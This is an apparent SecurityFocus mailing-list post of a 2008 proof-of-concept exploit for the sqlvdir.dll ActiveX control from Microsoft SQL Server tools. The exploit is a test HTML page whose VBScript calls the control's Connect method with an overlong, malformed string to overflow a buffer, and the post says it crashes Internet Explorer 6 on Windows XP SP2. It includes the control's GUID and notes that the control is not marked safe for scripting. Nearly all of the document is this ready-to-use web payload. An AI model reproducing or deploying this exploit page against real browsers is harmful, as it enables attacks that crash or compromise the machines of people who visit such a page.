sqlvdir.dll ActiveX Remote Buffer Overflow Exploit Sep 11 2008 10:21AM
beenudel1986 gmail com
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - r4s4al #
# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE #
# and all darkc0de members ---#
################################################################
#
# Author: Beenu Arora
#
# Home : www.BeenuArora.com
#
# Email : beenudel1986 (at) gmail (dot) com [email concealed]
#
# Share the c0de!
#
################################################################
#
# sqlvdir.dll ActiveX Remote Buffer Overflow Exploit
#
# Successfull exploitation crashes the Browser
#
# Tested On : WinXp Sp-2 IE 6.0
#
#################################################
# Loaded File: C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll
# Class SQLVDirControl
# GUID: {FC13BAA2-9C1A-4069-A221-31A147636038}
# Number of Interfaces: 1
# Default Interface: ISQLVDirControl
# RegKey Safe for Script: False
# RegkeySafe for Init: False
# KillBitSet: False
#################################################


<html>
Test Exploit page
<object classid='clsid:FC13BAA2-9C1A-4069-A221-31A147636038' id='target' ></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll"
prototype = "Sub Connect ( [ ByVal szServer As Variant ] , [ ByVal szWebSite As Variant ] )"
memberName = "Connect"
progid = "SQLVDIRLib.SQLVDirControl"
argCount = 2
arg1="defaultV"
arg2="http://test\test\test\te?s\test\test\tes\ttest\test\te@st\tes\test
\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\t
e
st\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\
te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test
\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\
\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\tes
t\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te
?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\
test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\"

target.Connect arg1 ,arg2

</script>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus